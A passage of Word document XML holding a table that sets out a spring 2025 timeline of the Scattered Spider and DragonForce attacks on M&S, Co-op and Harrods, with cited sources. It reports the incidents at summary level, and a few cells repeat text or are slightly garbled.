              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0051437F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E22378C" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="0051437F" w:rsidRDefault="00991A73" w:rsidP="00B76B63">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0051437F">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="1DEF9668" w14:textId="77777777" w:rsidTr="006068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58DBEE59" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Feb 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0853A4AD" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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Initial Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BE13A3F" w14:textId="04EC01CA" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00BA6ED1" w:rsidP="007D1079">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Through a third-party IT supplier (TCS), Scattered Spider enters M&amp;S. All domain password hashes were obtained through the exfiltration of NTDS.dit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A843B9B" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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[15][16]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="70E85202" w14:textId="77777777" w:rsidTr="006068B9">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B69D93E" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>19-21 Apr 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76BFE19B" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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Impact / Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A3EFF74" w14:textId="281BD1EE" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00BA6ED1"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Click &amp; Collect and M&amp;S payments are unsuccessful. VMware ESXi virtual machines are encrypted by the DragonForce malware. M&amp;S verifies the April 21 event.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DDAE0A1" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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[2][18][19]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="5EDA925B" w14:textId="77777777" w:rsidTr="006068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1B9F088C" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>22 Apr 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F17930A" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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Public Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0670B89C" w14:textId="7B938E39" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00881420" w:rsidP="007D1079">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Texted through a stolen email account of one of its staff, Dragonforce contacts Stuart Machin, CEO of M&amp;S and gives them a ransom.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D66E136" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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[17][7]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="0419D9C8" w14:textId="77777777" w:rsidTr="006068B9">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="022DA0AD" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>23 Apr 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B79CABD" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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Ransom Demand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A638FD9" w14:textId="4DB87B86" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00881420"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M&amp;S suspends all e-commerce over a period of 46 days; it is assumed that it will lose GBP 3.8 million in revenue every day.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58926AD9" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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[2][16]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="74BDA2BC" w14:textId="77777777" w:rsidTr="006068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6EC4840D" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>25 Apr 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="040AE1FC" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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Online Sales Halted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308C2C62" w14:textId="1B728E31" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00BA6ED1" w:rsidP="007D1079">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All e-commerce is suspended by M&amp;S for 46 days; the expected daily revenue loss is GBP 3.8 million.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C8F690C" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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[2][18]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="30D80626" w14:textId="77777777" w:rsidTr="006068B9">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A18FB09" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>30 Apr 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B63621C" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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Co-op Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EB79DD8" w14:textId="12C2972F" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00881420"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Co-op identifies intrusions, isolates IT systems and instructs employees to abandon the use of VPNs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752F40DB" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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[7][19]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="0211F7E9" w14:textId="77777777" w:rsidTr="006068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6A70AB8E" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>~1 May 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F7258EC" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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Co-op Exfil Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60CA5CFA" w14:textId="76D5FE5A" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00BA6ED1" w:rsidP="007D1079">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Confirmed exfiltration of member PII (names, contacts)</w:t>
            </w:r>
            <w:r w:rsidR="00534FB1" w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>The d. Rebuilding Windows domain controllers is necessary.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E5DDDC7" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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[15][19]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="5E8BA444" w14:textId="77777777" w:rsidTr="006068B9">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0660463E" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>1-2 May 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36736C87" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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Harrods Incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="051743C4" w14:textId="34A6DFF2" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00BA6ED1"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Harrods limits internet access and admits a hacking issue. connected to the same actor's campaign.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="688F5A64" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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[18][20]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="628E9ABA" w14:textId="77777777" w:rsidTr="006068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2E299ACC" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>5 May 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D2452A3" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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NCSC Advisory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4582F87A" w14:textId="68BEBE9C" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00BA6ED1" w:rsidP="007D1079">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NCSC releases urgent sector guidelines regarding MFA reset controls and helpdesk social engineering.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C83422D" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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[7]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="18DE56C7" w14:textId="77777777" w:rsidTr="006068B9">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13D2BE5F" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>13 May 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16DDEC1A" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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M&amp;S Breach Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AB74DA7" w14:textId="22E19857" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="000D0F11"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M&amp;S rejects payment card / password breach but acknowledges PII (names, DOBs and addresses) breach.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="452ADFF3" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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[17][19]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="2F3E733A" w14:textId="77777777" w:rsidTr="006068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24B3E08B" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Jun 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23B9FC94" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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CMC Category 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="311B8991" w14:textId="42A91221" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="000D0F11" w:rsidP="007D1079">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The UK Cyber Monitoring Centre regards combined events with a cost of between GBP 270 million and GBP 440 million as a Category 2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08794450" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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[3]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="3A0B9A6D" w14:textId="77777777" w:rsidTr="006068B9">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09D73A76" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>8 Jul 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20EA71CC" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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Parliament Hearing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D1C6A09" w14:textId="29B50DB3" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00BA6ED1"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M&amp;S Chairman Norman affirms that the attacker used employee impersonation to control a third-party help desk.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="261CCDB0" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437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[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00551A2E" w:rsidRPr="00C668B5" w14:paraId="51E9AAA4" w14:textId="77777777" w:rsidTr="006068B9">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1696" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A3017FE" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cstheme="majorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C668B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Arial" w:cstheme="majorHAnsi"/>
              </w:rPr>
              <w:t>Sep 2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1474" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="521567A7" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">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Co-op Losses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4814" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A365F97" w14:textId="63A75560" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00BA6ED1" w:rsidP="007D1079">
            <w:pPr>
              <w:jc w:val="both"/>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Co-op interim results: GBP 206 million in revenue decline and GBP 80 million in operating profit loss.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1376" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32FDE93D" w14:textId="77777777" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="0051437F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1"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[15][21]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65EC0E72" w14:textId="77777777" w:rsidR="006068B9" w:rsidRPr="00C668B5" w:rsidRDefault="006068B9" w:rsidP="000B2DA7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C668B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Table 1: Incident Timeline - M&amp;S and Co-op Cyber Campaign, Spring 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34010EB5" w14:textId="77777777" w:rsidR="00981BC9" w:rsidRPr="00C668B5" w:rsidRDefault="00981BC9" w:rsidP="007D1079">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7978191E" w14:textId="78B7889E" w:rsidR="00991A73" w:rsidRPr="00C668B5" w:rsidRDefault="00991A73" w:rsidP="007D1079">
